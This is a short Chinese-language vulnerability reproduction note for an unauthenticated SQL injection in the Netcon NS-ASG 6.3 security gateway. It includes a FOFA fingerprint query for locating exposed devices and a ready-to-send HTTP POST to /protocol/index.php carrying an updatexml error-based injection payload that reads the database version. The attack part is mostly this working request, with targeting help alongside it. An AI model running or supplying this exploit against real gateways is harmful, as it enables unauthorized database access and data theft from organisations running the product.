W3-1网康科技-NS-ASG应用安全网关-SQL

漏洞描述：

由于网康科技 NS-ASG 应用安全网关 /protocol/firewall/uploadmacbind.php文件没有对用户输入的参数进行严格的校验和过滤，导致输入的语句直接插入到数据库执行造成SQL注入，未经身份验证的攻击者可以远程发起攻击获取服务器敏感数据。

影响版本：

version = NS-ASG 6.3  

网站图片:

网络测绘:

fofa语法：

FOFA：app=“网康科技-NS-ASG安全网关”

漏洞复现:

payload：

POST /protocol/index.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

jsoncontent={"protocolType":"uploadmacbind","messagecontent":["1'and(updatexml(1,concat(0x7e,(select+version()),0x7e),1))='"]}

效果图:
查询数据库版本